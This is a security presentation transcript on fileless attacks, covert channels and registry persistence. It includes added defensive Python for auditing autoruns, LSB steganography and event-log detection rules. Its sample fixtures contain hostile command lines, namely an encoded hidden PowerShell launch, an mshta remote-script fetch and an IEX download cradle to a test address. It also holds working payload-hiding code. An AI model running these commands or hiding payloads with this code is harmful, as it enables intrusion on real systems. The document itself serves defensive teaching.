
Increasing Covert Channels and Fileless Attacks: A Rising Threat to All Industries

Covert channels and fileless attacks are becoming more prevalent across industries, utilizing hidden communication and evading traditional security measures. Learn about the methods, effectiveness, and prevention of these sophisticated attacks.


Presentation Transcript


  1. "Hiding in Plain Sight: Fileless Attacks and Covert Communication Channels are Increasing Across all Industries."

  2. Terms
  • Covert channel: the capability to transfer information between two hosts that are not explicitly allowed to communicate.
  • Fileless malware: an attack technique that avoids writing a malicious executable file to disk at one stage or another, using exploits, macros, scripts, or legitimate system tools instead.
  • Steganography: concealing messages or information within other non-

  3. Fileless Malware
  • Most of these attacks are actually "semi-fileless": some artifact (a document, a script, a registry value) still touches disk, but the malicious executable does not.
  • Once a host is compromised, these attacks abuse legitimate system and admin tools and processes to gain persistence, elevate privileges, and spread laterally across the network.
  • They evade protection by traditional file-based or signature-based tools, so any technique designed to circumvent or evade detection by those tools really falls into the fileless attack category.

  4. Why is this Method Effective?
  • Doesn't trigger anti-virus (file/signature-based)
  • Non-persistent (runs in memory)
  • "Lives off the land": PowerShell, WMI, VBScript; on Linux: Python, Perl, Bash scripts

  5. How they do it

  6. Covert Communication Channels
  • Receive commands
  • Send execution feedback (go/no-go)
  • Receive updates
  • Evade security defenses (IDS, AV, IR, forensic analysis)
  • Exfiltrate data

  7. Covert Channels

  8. Sophistication

  9. Persistence: Modifying Registry Keys
  • Run/RunOnce keys: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce (HKEY_LOCAL_MACHINE carries the same pair)
  • BootExecute key
  • AppInit_DLLs: DLLs loaded into every process that loads User32.dll (which most GUI programs do)
  • BootExecute: programs launched by smss.exe at system startup
  • Browser Helper Objects: DLLs loaded by Internet Explorer when it starts
  • File Association: program(s) run when a file of a certain type is opened
  • Notify: Winlogon notification packages, DLLs that Winlogon loads and calls on logon, logoff, lock and similar session events
  • Run/RunOnce: programs run when a user logs in
  • Services: Windows services executed at startup
  • Shell: the Winlogon value that names the user shell; it should point to explorer.exe
  • Startup: the Startup folder, programs run when the user logs in

  10. Persistence
  • Run/RunOnce keys: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • BootExecute key: smss.exe launches before the Windows subsystem loads, and asks the configuration manager to load the remaining registry hives (tracked under HKLM\SYSTEM\CurrentControlSet\Control\hivelist). It then launches anything present in the BootExecute value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager; on a clean system that value contains only "autocheck autochk *".
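The autorun locations on these two slides are the first places to look on a suspected fileless compromise. The script below is an added example and is not part of the presentation: when run on Windows it reads the Run/RunOnce keys and the Session Manager BootExecute value through Python's winreg module, and on any platform it flags values that launch a script interpreter or execution proxy, especially with the payload inline in the command line. The interpreter list, the payload patterns, the SAMPLE_ENTRIES snapshot and the value names in it are constructed for illustration, not taken from any real host.

```python
"""Audit Windows autorun locations for living-off-the-land persistence.

Added example, not from the presentation.  collect_autoruns() reads the live
registry and so only works on Windows; flag_suspicious() is plain Python and
runs anywhere over a collected or exported snapshot.
"""
import re
import sys

# Locations from the slides: Run/RunOnce under both hives, plus the
# BootExecute value that smss.exe honours before the Windows subsystem is up.
AUTORUN_KEYS = [
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
]
BOOTEXECUTE_KEY = ("HKLM", r"SYSTEM\CurrentControlSet\Control\Session Manager")
DEFAULT_BOOTEXECUTE = {"autocheck autochk *"}      # stock value on a clean system

# Interpreters and execution proxies abused by fileless tradecraft (illustrative list).
LOLBINS = re.compile(
    r"\b(powershell|pwsh|wscript|cscript|mshta|regsvr32|rundll32|wmic|certutil|bitsadmin)(\.exe)?\b",
    re.IGNORECASE)
# Signs that the payload lives in the command line rather than in a file on disk.
INLINE_PAYLOAD = re.compile(
    r"(-enc(odedcommand)?\b|\biex\b|invoke-expression|downloadstring|frombase64string|"
    r"javascript:|vbscript:|https?://)", re.IGNORECASE)


def collect_autoruns():
    """Return [(location, value_name, data)] from the live registry (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs Windows; run flag_suspicious() on a snapshot")
    import winreg  # imported here so the module still loads on non-Windows hosts

    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    entries = []
    for hive, path in AUTORUN_KEYS:
        try:
            key = winreg.OpenKey(hives[hive], path)
        except OSError:
            continue                                 # key absent on this host
        with key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break                            # no more values
                entries.append((hive + "\\" + path, name, str(data)))
                index += 1
    hive, path = BOOTEXECUTE_KEY
    with winreg.OpenKey(hives[hive], path) as key:
        data, _ = winreg.QueryValueEx(key, "BootExecute")   # REG_MULTI_SZ -> list of str
        entries.append((hive + "\\" + path, "BootExecute", list(data)))
    return entries


def flag_suspicious(entries):
    """Return [(location, value_name, reason)] for entries that look like LotL persistence."""
    findings = []
    for location, name, data in entries:
        if name == "BootExecute":
            items = data if isinstance(data, list) else [data]
            extra = [v for v in items if v.strip().lower() not in DEFAULT_BOOTEXECUTE]
            if extra:
                findings.append((location, name, "non-default BootExecute entries: " + ", ".join(extra)))
            continue
        lolbin = LOLBINS.search(data)
        if not lolbin:
            continue
        payload = INLINE_PAYLOAD.search(data)
        if payload:
            reason = f"{lolbin.group(1).lower()} with inline payload ({payload.group(0)})"
        else:
            reason = f"script interpreter or proxy in autorun: {lolbin.group(1).lower()}"
        findings.append((location, name, reason))
    return findings


# Constructed snapshot standing in for collect_autoruns() output (names/paths are made up).
SAMPLE_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Cleanup",
     r'mshta.exe javascript:a=GetObject("script:https://cdn.example.invalid/x.sct");close()'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
    (r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager", "BootExecute",
     ["autocheck autochk *", "wsvc.exe"]),
]

if __name__ == "__main__":
    entries = collect_autoruns() if sys.platform == "win32" else SAMPLE_ENTRIES
    for location, name, reason in flag_suspicious(entries):
        print(f"[!] {location}\\{name}: {reason}")
```

The interesting design point is the split: collection is the only part that needs the host, so the same flag_suspicious() can be pointed at a registry export from a forensic image. A clean OneDrive or SecurityHealth entry produces no finding, while an interpreter launched with an encoded command, an mshta javascript: one-liner, or anything beyond "autocheck autochk *" in BootExecute does.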

  11. Steganography
  • Hidden malicious code/payload inside of images
  • Least Significant Bit (LSB) method: payload bits replace the lowest bit of each pixel value, which changes the image imperceptibly

  12. Simple .jpeg image right?

  13. Not quite
  • Information stealer
  • Downloader module
  • Detects analysis environment
  • Downloads an image from legitimate websites
  • Extracts main module code from the image
  • Launches the main module code
  • Creates a verbose profile of the infected host
  • Downloads additional modules, depending on the host profile
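Slide 11 names the LSB method and slide 13 describes a downloader that pulls an ordinary-looking image and extracts its main module from it. The following is an added example, not the presentation's code or any real sample: it embeds a payload in the least significant bit of each pixel sample and recovers it again. The framing (a constructed "LSB1" marker plus a 4-byte length) is my own convention so the extractor knows where the payload ends; the cover buffer is constructed pseudo-random pixel data standing in for a decoded PNG/BMP, so no image library is needed.

```python
"""Least-significant-bit (LSB) steganography over raw 8-bit pixel samples.

Added example, not the presentation's code.  The cover is a constructed
buffer of samples (what a lossless PNG/BMP decodes to); the "LSB1" framing
is a made-up convention for this example.
"""
import random
import struct
from typing import Optional

MAGIC = b"LSB1"      # constructed framing: marker + 4-byte big-endian length + payload


def embed(cover: bytes, payload: bytes) -> bytes:
    """Return a copy of cover whose LSBs carry the framed payload, MSB-first."""
    frame = MAGIC + struct.pack(">I", len(payload)) + payload
    if len(frame) * 8 > len(cover):
        raise ValueError(f"cover too small: need {len(frame) * 8} samples, have {len(cover)}")
    out = bytearray(cover)
    pos = 0
    for byte in frame:
        for shift in range(7, -1, -1):
            out[pos] = (out[pos] & 0xFE) | ((byte >> shift) & 1)   # touch only bit 0
            pos += 1
    return bytes(out)


def _read_bytes(samples: bytes, offset: int, count: int) -> bytes:
    """Reassemble `count` bytes from the LSBs starting at sample `offset`."""
    data = bytearray()
    for b in range(count):
        value = 0
        for k in range(8):
            value = (value << 1) | (samples[offset + b * 8 + k] & 1)
        data.append(value)
    return bytes(data)


def extract(stego: bytes) -> Optional[bytes]:
    """Return the hidden payload, or None if the framing is absent or inconsistent."""
    header_len = len(MAGIC) + 4
    if len(stego) < header_len * 8:
        return None
    header = _read_bytes(stego, 0, header_len)
    if header[:len(MAGIC)] != MAGIC:
        return None
    (length,) = struct.unpack(">I", header[len(MAGIC):])
    if len(stego) < (header_len + length) * 8:
        return None          # length field points past the cover: damaged or not ours
    return _read_bytes(stego, header_len * 8, length)


def max_sample_delta(a: bytes, b: bytes) -> int:
    """Largest per-sample change between two buffers (LSB embedding gives at most 1)."""
    return max(abs(x - y) for x, y in zip(a, b))


def make_cover(n_samples: int, seed: int = 7) -> bytes:
    """Constructed stand-in for a decoded image: pseudo-random 8-bit samples."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(n_samples))


if __name__ == "__main__":
    cover = make_cover(200 * 200 * 3)          # a 200x200 RGB image's worth of samples
    module = b"# constructed stage-2 stub\nprint('hello from inside the image')\n"
    stego = embed(cover, module)
    print("max per-sample change:", max_sample_delta(cover, stego))   # at most 1
    print("recovered:", extract(stego))
    print("from the clean cover:", extract(cover))
```

Two practical points follow from the code. Each pixel value moves by at most one step, which is why the carrier looks untouched to a viewer and to a file-based scanner that only sees a valid image. And because the hidden bits live in the lowest bit of the raw samples, any lossy re-encoding (a JPEG round trip, for instance) scrambles them, so plain LSB hiding is used with lossless formats; JPEG-based techniques hide data in the DCT coefficients instead. The "Simple .jpeg image right?" slide is therefore a reminder to look past the file extension, not a claim about this particular encoding.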

  14. Prevention, Detection, Correction

  15. Prevention
  User training
  • Formal, user friendly, updated at least annually
  • Initial and annual requirement
  • Testing (phishing simulations)
  Prevention technologies ($$$)
  • Secure email gateway
  • Secure web gateway
  • Next-gen endpoint protection (advanced threat prevention, heuristics)
  • MFA/2FA for remote access, and down to some endpoints
  Technical policy controls ("free")
  • Block risky email attachments (.exe, .bat, .doc, .dll, .js, .vbs, .ps1, .cmd, .msi, .inf, .sh)
  • Browser extensions: whitelist via Group Policy
  • Remove local admin privileges
  • Secure use of Enterprise Admin / Domain Admin (EA/DA) accounts
  • Patching

  16. Detection
  • Alert rules for anomalous behavior:
    • Processes executing shell commands
    • Suspicious commands executed by listening (network-facing) processes
    • Excessive or abnormal network communication from a process
  • TLS decryption at the edge
  • Persistence and privilege escalation: limit what is possible, and alert on attempts
  • Sandbox file detonation

  17. Detection cont'd.
  • PowerShell event 4104 (Script Block Logging) contains a ton of data
  • Event 4688 (process creation, with command-line auditing enabled): PowerShell launched via PsExec or WMIC
  • Suspicious service creation
  • User creation, and users added to the local or global Administrators group
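Slides 16 and 17 list the behaviours to alert on but not how a rule sees them. The script below is an added example, not from the presentation: a small rule set over Windows event records, run on constructed sample events. Event records are dicts carrying the fields you would pull from Get-WinEvent; the event IDs are real (4688 process creation, 4104 PowerShell script block logging, 7045 service installed, 4720 user created, 4732 member added to a local security group), while the rule names, severities, patterns, host names and the 203.0.113.5 test address are my own constructions.

```python
"""Detection rules for the two slides above, run over constructed events.

Added example, not from the presentation.  Each event is a dict of the
fields you would pull from Get-WinEvent.  Event IDs: 4688 process creation
(needs command-line auditing), 4104 PowerShell script block logging,
7045 service installed, 4720 user created, 4732 member added to a local group.
"""
import re

REMOTE_EXEC_PARENTS = {"psexesvc.exe", "wmiprvse.exe"}   # PsExec service, WMI provider host
SUSPICIOUS_PS = re.compile(
    r"(-enc(odedcommand)?\b|\biex\b|invoke-expression|downloadstring|downloadfile|"
    r"frombase64string|reflection\.assembly|-nop\b|-w(indowstyle)?\s+hidden)", re.IGNORECASE)
SUSPICIOUS_SERVICE_IMAGE = re.compile(
    r"(%comspec%|cmd\.exe|powershell|\\temp\\|\\users\\)", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return [(rule, severity)] hits for one event dict."""
    eid, hits = event["EventID"], []
    if eid == 4688:
        proc = _basename(event.get("NewProcessName", ""))
        parent = _basename(event.get("ParentProcessName", ""))
        cmd = event.get("CommandLine", "")
        if proc in ("powershell.exe", "pwsh.exe") and parent in REMOTE_EXEC_PARENTS:
            hits.append(("powershell-via-psexec-or-wmi", "high"))
        if proc == "wmic.exe" and "process call create" in cmd.lower():
            hits.append(("wmic-process-call-create", "medium"))
        m = SUSPICIOUS_PS.search(cmd)
        if m:
            hits.append(("suspicious-commandline:" + m.group(0).lower(), "medium"))
    elif eid == 4104:
        m = SUSPICIOUS_PS.search(event.get("ScriptBlockText", ""))
        if m:
            hits.append(("scriptblock:" + m.group(0).lower(), "medium"))
    elif eid == 7045:
        image = event.get("ImagePath", "")
        if event.get("ServiceName", "").lower() == "psexesvc" or _basename(image) == "psexesvc.exe":
            hits.append(("psexec-service-installed", "medium"))
        if SUSPICIOUS_SERVICE_IMAGE.search(image):
            hits.append(("suspicious-service-image", "high"))
    elif eid == 4720:
        hits.append(("local-user-created", "low"))
    elif eid == 4732 and event.get("TargetUserName", "").lower() == "administrators":
        hits.append(("added-to-local-administrators", "high"))
    return hits


def run_rules(events):
    """Flatten hits across a list of events as (EventID, rule, severity)."""
    return [(e["EventID"], rule, sev) for e in events for rule, sev in evaluate(e)]


# Constructed sample events: two noisy-but-benign records sit among the hits.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"},
    {"EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "WinUpdateSvc",
     "ImagePath": "%COMSPEC% /c powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"EventID": 4720, "TargetUserName": "svc_backup"},
    {"EventID": 4732, "TargetUserName": "Administrators", "MemberName": r"CORP\svc_backup"},
    {"EventID": 4732, "TargetUserName": "Remote Desktop Users", "MemberName": r"CORP\jdoe"},
]

if __name__ == "__main__":
    for eid, rule, sev in run_rules(SAMPLE_EVENTS):
        print(f"{eid} {sev:6} {rule}")
```

Two of the rules depend on configuration the slide hints at: 4688 only carries a CommandLine field when "Include command line in process creation events" is enabled, and 4104 only exists when Script Block Logging is turned on. Without those, the PsExec-spawned PowerShell on the first sample event still fires on the parent/child relationship, but the -nop/-enc evidence and the IEX download cradle are invisible.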

  18. Correction
  Incident Response Plan
  • Playbook
  • Tested: practice "cyber fire drills"
  • Updated
  System Recovery/Backups
  • VSS (Volume Shadow Copies)
  • VM snapshots
  • Onsite and off-site
  Third-party response retainer

  19. Impacts/Consequences
  • Temporary or permanent loss of sensitive or proprietary information
  • Disruption to business operations
  • Financial losses: restoring systems and files, fines, lawsuits
  • Potential harm to an organization's reputation

  20. Resources
  • MITRE ATT&CK
  • NSA's "Spotting the Adversary with Windows Event Log Monitoring"
  • Internet Storm Center Daily Podcast
  • US-CERT Alerts & Advisories
  • Microsoft Security Response Center (MSRC)

  21. Questions?
